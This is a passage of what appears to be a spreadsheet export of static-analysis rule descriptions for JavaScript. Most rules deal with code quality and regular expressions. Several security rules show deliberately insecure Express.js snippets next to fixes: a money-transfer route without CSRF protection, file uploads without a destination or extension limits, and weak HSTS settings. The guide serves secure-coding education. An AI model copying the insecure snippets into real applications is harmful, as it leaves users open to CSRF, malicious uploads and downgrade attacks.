  &lt;li&gt; The web application uses cookies to authenticate users. &lt;/li&gt;
  &lt;li&gt; There exist sensitive operations in the web application that can be performed when the user is authenticated. &lt;/li&gt;
  &lt;li&gt; The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Protection against CSRF attacks is strongly recommended:
    &lt;ul&gt;
      &lt;li&gt; to be activated by default for all &lt;a href="https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Safe_methods"&gt;unsafe HTTP
      methods&lt;/a&gt;. &lt;/li&gt;
      &lt;li&gt; implemented, for example, with an unguessable CSRF token &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
  &lt;li&gt; Of course all sensitive operations should not be performed with &lt;a
  href="https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Safe_methods"&gt;safe HTTP&lt;/a&gt; methods like &lt;code&gt;GET&lt;/code&gt; which are designed to be
  used only for information retrieval. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;Express.js CSURF middleware&lt;/a&gt; protection is not found on an unsafe HTTP method like POST
method:&lt;/p&gt;
&lt;pre&gt;
let csrf = require('csurf');
let express = require('express');
let csrfProtection = csrf({ cookie: true });
let app = express();
// Sensitive: this operation doesn't look like protected by CSURF middleware (csrfProtection is not used)
app.post('/money_transfer', parseForm, function (req, res) {
  res.send('Money transferred');
});
&lt;/pre&gt;
&lt;p&gt;Protection provided by &lt;a href="https://www.npmjs.com/package/csurf"&gt;Express.js CSURF middleware&lt;/a&gt; is globally disabled on unsafe methods:&lt;/p&gt;
&lt;pre&gt;
let csrf = require('csurf');
let express = require('express');
app.use(csrf({ cookie: true, ignoreMethods: ["POST", "GET"] })); // Sensitive as POST is unsafe method
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;Express.js CSURF middleware&lt;/a&gt; protection is used on unsafe methods:&lt;/p&gt;
&lt;pre&gt;
let csrf = require('csurf');
let express = require('express');
let csrfProtection = csrf({ cookie:  true });
let app = express();
app.post('/money_transfer', parseForm, csrfProtection, function (req, res) { // Compliant
  res.send('Money transferred')
});
&lt;/pre&gt;
&lt;p&gt;Protection provided by &lt;a href="https://www.npmjs.com/package/csurf"&gt;Express.js CSURF middleware&lt;/a&gt; is enabled on unsafe methods:&lt;/p&gt;
&lt;pre&gt;
let csrf = require('csurf');
let express = require('express');
app.use(csrf({ cookie: true, ignoreMethods: ["GET"] })); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/352.html"&gt;MITRE, CWE-352&lt;/a&gt; - Cross-Site Request Forgery (CSRF) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-community/attacks/csrf"&gt;OWASP: Cross-Site Request Forgery&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2201</t>
  </si>
  <si>
    <t>Return values from functions without side effects should not be ignored</t>
  </si>
  <si>
    <t>&lt;p&gt;When the call to a function doesnâ€™t have any side effects, what is the point of making the call if the results are ignored? In such case, either
the function call is useless and should be dropped or the source code doesnâ€™t behave as expected.&lt;/p&gt;
&lt;p&gt;To prevent generating any false-positives, this rule triggers an issues only on a predefined list of known objects &amp;amp; functions.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
'hello'.lastIndexOf('e'); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let char = 'hello'.lastIndexOf('e');
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4624</t>
  </si>
  <si>
    <t>Template literals should not be nested</t>
  </si>
  <si>
    <t>&lt;p&gt;Template literals (previously named "template strings") are an elegant way to build a string without using the &lt;code&gt;+&lt;/code&gt; operator to make
strings concatenation more readable.&lt;/p&gt;
&lt;p&gt;However, itâ€™s possible to build complex string literals by nesting together multiple template literals, and therefore lose readability and
maintainability.&lt;/p&gt;
&lt;p&gt;In such situations, itâ€™s preferable to move the nested template into a separate statement.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let color = "red";
let count = 3;
let message = `I have ${color ? `${count} ${color}` : count} apples`; // Noncompliant; nested template strings not easy to read
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let color = "red";
let count = 3;
let apples = color ? `${count} ${color}` : count;
let message = `I have ${apples} apples`;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6035</t>
  </si>
  <si>
    <t>Single-character alternations in regular expressions should be replaced with character classes</t>
  </si>
  <si>
    <t>&lt;p&gt;When an alternation contains multiple alternatives that consist of a single character, it can be rewritten as a character class. This should be
preferred because it is more efficient and can even help prevent stack overflows when used inside a repetition (see rule {rule:javascript:S5998}).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/a|b|c/; // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/[abc]/;
// or
/[a-c]/;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5868</t>
  </si>
  <si>
    <t>Unicode Grapheme Clusters should be avoided inside regex character classes</t>
  </si>
  <si>
    <t>&lt;p&gt;When placing Unicode &lt;a href="https://unicode.org/glossary/#grapheme_cluster"&gt;Grapheme Clusters&lt;/a&gt; (characters which require to be encoded in
multiple &lt;a href="https://unicode.org/glossary/#code_point"&gt;Code Points&lt;/a&gt;) inside a character class of a regular expression, this will likely lead
to unintended behavior.&lt;/p&gt;
&lt;p&gt;For instance, the grapheme cluster &lt;code&gt;cÌˆ&lt;/code&gt; requires two code points: one for &lt;code&gt;'c'&lt;/code&gt;, followed by one for the &lt;em&gt;umlaut&lt;/em&gt;
modifier &lt;code&gt;'\u{0308}'&lt;/code&gt;. If placed within a character class, such as &lt;code&gt;[cÌˆ]&lt;/code&gt;, the regex will consider the character class being the
enumeration &lt;code&gt;[c\u{0308}]&lt;/code&gt; instead. It will, therefore, match every &lt;code&gt;'c'&lt;/code&gt; and every &lt;em&gt;umlaut&lt;/em&gt; that isnâ€™t expressed as a
single codepoint, which is extremely unlikely to be the intended behavior.&lt;/p&gt;
&lt;p&gt;This rule raises an issue every time Unicode Grapheme Clusters are used within a character class of a regular expression.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
"ccÌˆdÌˆd".replace(/[cÌˆdÌˆ]/g, "X"); // result is "XXXXXX" and not expected "cXXd"
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
"ccÌˆdÌˆd".replace(/cÌˆ|dÌˆ/g, "X"); // result is "cXXd"
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5869</t>
  </si>
  <si>
    <t>Character classes in regular expressions should not contain the same character twice</t>
  </si>
  <si>
    <t>&lt;p&gt;Character classes in regular expressions are a convenient way to match one of several possible characters by listing the allowed characters or
ranges of characters. If the same character is listed twice in the same character class or if the character class contains overlapping ranges, this
has no effect.&lt;/p&gt;
&lt;p&gt;Thus duplicate characters in a character class are either a simple oversight or a sign that a range in the character class matches more than is
intended or that the author misunderstood how character classes work and wanted to match more than one character. A common example of the latter
mistake is trying to use a range like &lt;code&gt;[0-99]&lt;/code&gt; to match numbers of up to two digits, when in fact it is equivalent to &lt;code&gt;[0-9]&lt;/code&gt;.
Another common cause is forgetting to escape the &lt;code&gt;-&lt;/code&gt; character, creating an unintended range that overlaps with other characters in the
character class.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/[0-99]/ // Noncompliant, this won't actually match strings with two digits
/[0-9.-_]/ // Noncompliant, .-_ is a range that already contains 0-9 (as well as various other characters such as capital letters)
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/[0-9]{1,2}/
/[0-9.\-_]/
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5742</t>
  </si>
  <si>
    <t>Disabling Certificate Transparency monitoring is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Certificate_Transparency"&gt;Certificate Transparency&lt;/a&gt; (CT) is an open-framework to
protect against identity theft when certificates are issued. &lt;a href="https://en.wikipedia.org/wiki/Certificate_authority"&gt;Certificate Authorities&lt;/a&gt;
(CA) electronically sign certificate after verifying the identify of the certificate owner. Attackers use, among other things, social engineering
attacks to trick a CA to correctly verifying a spoofed identity/forged certificate.&lt;/p&gt;
&lt;p&gt;CAs implement Certificate Transparency framework to publicly log the records of newly issued certificates, allowing the public and in particular
the identity owner to monitor these logs to verify that his identify was not usurped.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The website identity is valuable and well-known, therefore prone to theft. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT"&gt;Expect-CT&lt;/a&gt; HTTP header which instructs the web browser
to check &lt;a href="https://www.certificate-transparency.org/known-logs"&gt;public CT logs&lt;/a&gt; in order to verify if the website appears inside and if it
is not, the browser will block the request and display a warning to the user.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/expect-ct"&gt;expect-ct&lt;/a&gt; middleware is disabled:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
    helmet({
      expectCt: false // Sensitive
    })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application the &lt;a href="https://www.npmjs.com/package/expect-ct"&gt;expect-ct&lt;/a&gt; middleware is the standard way to implement
expect-ct. Usually, the deployment of this policy starts with the report only mode (&lt;code&gt;enforce: false&lt;/code&gt;) and with a low &lt;code&gt;maxAge&lt;/code&gt;
(the number of seconds the policy will apply) value and next if everything works well it is recommended to block future connections that violate
Expect-CT policy (&lt;code&gt;enforce: true&lt;/code&gt;) and greater value for maxAge directive:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(helmet.expectCt({
  enforce: true,
  maxAge: 86400
})); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; -
  Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Certificate_Transparency"&gt;developer.mozilla.org&lt;/a&gt; - Certificate Transparency
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://en.wikipedia.org/wiki/Certificate_authority"&gt;wikipedia.org&lt;/a&gt; - Certificate Authority &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5863</t>
  </si>
  <si>
    <t>Assertions should not be given twice the same argument</t>
  </si>
  <si>
    <t>&lt;p&gt;Many assertions compare two objects or properties of these objects. Passing twice the same argument is likely to be a bug due to developerâ€™s
carelessness.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when a Chai assertion is given twice the same argument.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
describe("test the same object", function() {
    it("uses chai 'assert'", function() {
        const expected = '1'
        const actual = (1).toString()
        assert.equal(actual, actual);  // Noncompliant
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
describe("test the same object", function() {
    it("uses chai 'assert'", function() {
        const expected = '1'
        const actual = (1).toString()
        assert.equal(actual, expected);
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1264</t>
  </si>
  <si>
    <t>A "while" loop should be used instead of a "for" loop</t>
  </si>
  <si>
    <t>&lt;p&gt;When only the condition expression is defined in a &lt;code&gt;for&lt;/code&gt; loop, and the initialization and increment expressions are missing, a
&lt;code&gt;while&lt;/code&gt; loop should be used instead to increase readability.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (;condition;) { /*...*/ }
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
while (condition) { /*...*/ }
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1143</t>
  </si>
  <si>
    <t>Jump statements should not occur in "finally" blocks</t>
  </si>
  <si>
    <t>&lt;p&gt;Using &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, and &lt;code&gt;continue&lt;/code&gt; from a &lt;code&gt;finally&lt;/code&gt; block overwrites similar
statements from the suspended &lt;code&gt;try&lt;/code&gt; and &lt;code&gt;catch&lt;/code&gt; blocks.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when a jump statement (&lt;code&gt;break&lt;/code&gt;, &lt;code&gt;continue&lt;/code&gt;, &lt;code&gt;return&lt;/code&gt; and &lt;code&gt;throw&lt;/code&gt;) would force
control flow to leave a &lt;code&gt;finally&lt;/code&gt; block.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo() {
    try {
        return 1; // We expect 1 to be returned
    } catch(err) {
        return 2; // Or 2 in cases of error
    } finally {
        return 3; // Noncompliant: 3 is returned before 1, or 2, which we did not expect
    }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo() {
    try {
        return 1; // We expect 1 to be returned
    } catch(err) {
        return 2; // Or 2 in cases of error
    }
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/584.html"&gt;MITRE, CWE-584&lt;/a&gt; - Return Inside Finally Block &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5860</t>
  </si>
  <si>
    <t>Names of regular expressions named groups should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Why use named groups only to never use any of them later on in the code?&lt;/p&gt;
&lt;p&gt;This rule raises issues every time named groups are:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; defined but never called anywhere in the code through their name; &lt;/li&gt;
  &lt;li&gt; defined but called elsewhere in the code by their number instead; &lt;/li&gt;
  &lt;li&gt; referenced while not defined. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const date = "01/02";
const datePattern = /(?&amp;lt;month&amp;gt;[0-9]{2})\/(?&amp;lt;year&amp;gt;[0-9]{2})/;
const dateMatched = date.match(datePattern);
if (dateMatched !== null) {
  checkValidity(dateMatched[1], dateMatched[2]); // Noncompliant - numbers instead of names of groups are used
  checkValidity(dateMatched.groups.day); // Noncompliant - there is no group called "day"
}
// ...
const score = "14:1";
const scorePattern = /(?&amp;lt;player1&amp;gt;[0-9]+):(?&amp;lt;player2&amp;gt;[0-9]+)/; // Noncompliant - named groups are never used
const scoreMatched = score.match(scorePattern);
if (scoreMatched !== null) {
  checkScore(score);
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const date = "01/02";
const datePattern = /(?&amp;lt;month&amp;gt;[0-9]{2})\/(?&amp;lt;year&amp;gt;[0-9]{2})/;
const dateMatched = date.match(datePattern);
if (dateMatched !== null) {
  checkValidity(dateMatched.groups.month, dateMatched.groups.year);
}
// ...
const score = "14:1";
const scorePattern = /(?&amp;lt;player1&amp;gt;[0-9]+):(?&amp;lt;player2&amp;gt;[0-9]+)/;
const scoreMatched = score.match(scorePattern);
if (scoreMatched !== null) {
  checkScore(scoreMatched.groups.player1);
  checkScore(scoreMatched.groups.player2);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2598</t>
  </si>
  <si>
    <t>File uploads should be restricted</t>
  </si>
  <si>
    <t>&lt;p&gt;These minimum restrictions should be applied when handling file uploads:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; the file upload folder to restrict untrusted files to a specific folder. &lt;/li&gt;
  &lt;li&gt; the file extension of the uploaded file to prevent remote code execution. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also the size of the uploaded file should be limited to prevent denial of service attacks. This requirement is covered by the rule
{rule:javascript:S5693}.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/formidable"&gt;formidable&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const Formidable = require('formidable');
const form = new Formidable(); // Noncompliant, this form is not safe
form.uploadDir = ""; // because upload dir is not defined (by default os temp dir: /var/tmp or /tmp)
form.keepExtensions = true; // and file extensions are kept
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/multer"&gt;multer&lt;/a&gt; (Express.js middleware) module:&lt;/p&gt;
&lt;pre&gt;
const multer = require('multer');
let diskStorage = multer.diskStorage({ // Noncompliant: no destination specified
  filename: (req, file, cb) =&amp;gt; {
    const buf = crypto.randomBytes(20);
    cb(null, buf.toString('hex'))
  }
});
// This upload is not safe as no destination specified, /var/tmp or /tmp will be used
let diskupload = multer({
  storage: diskStorage,
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/formidable"&gt;formidable&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const Formidable = require('formidable');
const form = new Formidable(); // Compliant
form.uploadDir = "./uploads/";
form.keepExtensions = false;
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/multer"&gt;multer&lt;/a&gt; (Express.js middleware) module:&lt;/p&gt;
&lt;pre&gt;
const multer = require('multer');
let diskStorage = multer.diskStorage({  // Compliant
  filename: (req, file, cb) =&amp;gt; {
    const buf = crypto.randomBytes(20);
    cb(null, buf.toString('hex'))
  },
  destination: (req, file, cb) =&amp;gt; {
    cb(null, './uploads/')
  }
});
let diskupload = multer({
  storage: diskStorage,
});
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/434"&gt;CWE-434&lt;/a&gt; - Unrestricted Upload of File with Dangerous Type &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/400.html"&gt;CWE-400&lt;/a&gt; - Uncontrolled Resource Consumption &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References"&gt;OWASP Top 10 2017 Category A4&lt;/a&gt; - Insecure Direct
  Object References &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Unrestricted_File_Upload"&gt;OWASP Unrestricted File Upload&lt;/a&gt; - Unrestricted File Upload &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2234</t>
  </si>
  <si>
    <t>Parameters should be passed in the correct order</t>
  </si>
  <si>
    <t>&lt;p&gt;When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,
when the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will
likely lead to unexpected results.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function divide(divisor, dividend) {
  return divisor/dividend;
}
function doTheThing() {
  var divisor = 15;
  var dividend = 5;
  var result = divide(dividend, divisor);  // Noncompliant; operation succeeds, but result is unexpected
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function divide(divisor, dividend) {
  return divisor/dividend;
}
function doTheThing() {
  var divisor = 15;
  var dividend = 5;
  var result = divide(divisor, dividend);
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Swapped arguments that are compared beforehand in an enclosing &lt;code&gt;if&lt;/code&gt;-statement are ignored:&lt;/p&gt;
&lt;pre&gt;
function divide(divisor, dividend) {
  return divisor/dividend;
}
function doTheThing() {
  var divisor = 15;
  var dividend = 5;
  if (divisor &amp;gt; dividend) {
    var result = divide(dividend, divisor);
    //...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5867</t>
  </si>
  <si>
    <t>Regular expressions using Unicode character classes or property escapes should enable the unicode flag</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript regular expressions provide Unicode character classses and Unicode property escapes for matching characters based on their Unicode
values and Unicode properties respectively. When using Unicode property escapes like &lt;code&gt;\p{Alpha}&lt;/code&gt; without the &lt;code&gt;u&lt;/code&gt; flag, the
regular expression will not match alphabetic characters but rather the &lt;code&gt;+'\p{Alpha}+'&lt;/code&gt; string literal, which is likely a mistake.&lt;/p&gt;
&lt;p&gt;This rules raises an issue when Unicode character classses and Unicode property escapes are used without the &lt;code&gt;u&lt;/code&gt; flag.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/\u{1234}/
/\p{Alpha}/
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/\u{1234}/u
/\p{Alpha}/u
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5743</t>
  </si>
  <si>
    <t>Allowing browsers to perform DNS prefetching  is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;By default, web browsers perform &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Performance/dns-prefetch/"&gt;DNS prefetching&lt;/a&gt; to reduce
latency due to DNS resolutions required when an user clicks links from a website page.&lt;/p&gt;
&lt;p&gt;For instance on example.com the hyperlink below contains a cross-origin domain name that must be resolved to an IP address by the web browser:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;a href="https://otherexample.com"&amp;gt;go on our partner website&amp;lt;/a&amp;gt;
&lt;/pre&gt;
&lt;p&gt;It can add significant latency during requests, especially if the page contains many links to cross-origin domains. DNS prefetch allows web
browsers to perform DNS resolving in the background before the user clicks a link. This feature can cause privacy issues because DNS resolving from
the userâ€™s computer is performed without his consent if he doesnâ€™t intent to go to the linked website.&lt;/p&gt;
&lt;p&gt;On a complex private webpage, a combination "of unique links/DNS resolutions" can indicate, to a eavesdropper for instance, that the user is
visiting the private page.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Links to cross-origin domains could result in leakage of confidential information about the userâ€™s navigation/behavior of the website. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-DNS-Prefetch-Control"&gt;X-DNS-Prefetch-Control&lt;/a&gt; header with an
&lt;em&gt;off&lt;/em&gt; value but this could significantly degrade website performances.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/dns-prefetch-control"&gt;dns-prefetch-control&lt;/a&gt;
middleware is disabled or used without the recommended value:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.dnsPrefetchControl({
    allow: true // Sensitive: allowing DNS prefetching is security-sensitive
  })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application the &lt;a href="https://www.npmjs.com/package/dns-prefetch-control"&gt;dns-prefetch-control&lt;/a&gt; or &lt;a
href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; middleware is the standard way to implement &lt;code&gt;X-DNS-Prefetch-Control&lt;/code&gt; header:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.dnsPrefetchControl({
    allow: false // Compliant
  })
);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure.html"&gt;OWASP Top 10 2017 Category
  A3&lt;/a&gt; - Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-DNS-Prefetch-Control"&gt;developer.mozilla.org&lt;/a&gt; - X-DNS-Prefetch-Control
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Performance/dns-prefetch"&gt;developer.mozilla.org&lt;/a&gt; - Using dns-prefetch &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5739</t>
  </si>
  <si>
    <t>Disabling Strict-Transport-Security policy is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;When implementing the HTTPS protocol, the website mostly continue to support the HTTP protocol to redirect users to HTTPS when they request a HTTP
version of the website. These redirects are not encrypted and are therefore vulnerable to man in the middle attacks. The &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security"&gt;Strict-Transport-Security policy header&lt;/a&gt; (HSTS) set by
an application instructs the web browser to convert any HTTP request to HTTPS.&lt;/p&gt;
&lt;p&gt;Web browsers that see the Strict-Transport-Security policy header for the first time record information specified in the header:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; the &lt;code&gt;max-age&lt;/code&gt; directive which specify how long the policy should be kept on the web browser. &lt;/li&gt;
  &lt;li&gt; the &lt;code&gt;includeSubDomains&lt;/code&gt; optional directive which specify if the policy should apply on all sub-domains or not. &lt;/li&gt;
  &lt;li&gt; the &lt;code&gt;preload&lt;/code&gt; optional directive which is not part of the HSTS specification but supported on all modern web browsers. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the &lt;code&gt;preload&lt;/code&gt; directive the web browser never connects in HTTP to the website and to use this directive, it is required &lt;a
href="https://hstspreload.org/"&gt;to submit&lt;/a&gt; the concerned application to a preload service maintained by Google.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The website is accessible with the unencrypted HTTP protocol. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement Strict-Transport-Security policy header, it is recommended to apply this policy to all subdomains (&lt;code&gt;includeSubDomains&lt;/code&gt;) and
for at least 6 months (&lt;code&gt;max-age=15552000&lt;/code&gt;) or even better for 1 year (&lt;code&gt;max-age=31536000&lt;/code&gt;).&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; or &lt;a
href="https://www.npmjs.com/package/hsts"&gt;hsts&lt;/a&gt; middleware are disabled or used without recommended values:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(helmet.hsts({
  maxAge: 3153600, // Sensitive, recommended &amp;gt;= 15552000
  includeSubDomains: false // Sensitive, recommended 'true'
}));
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application a standard way to implement HSTS is with the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; or &lt;a
href="https://www.npmjs.com/package/hsts"&gt;hsts&lt;/a&gt; middleware:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
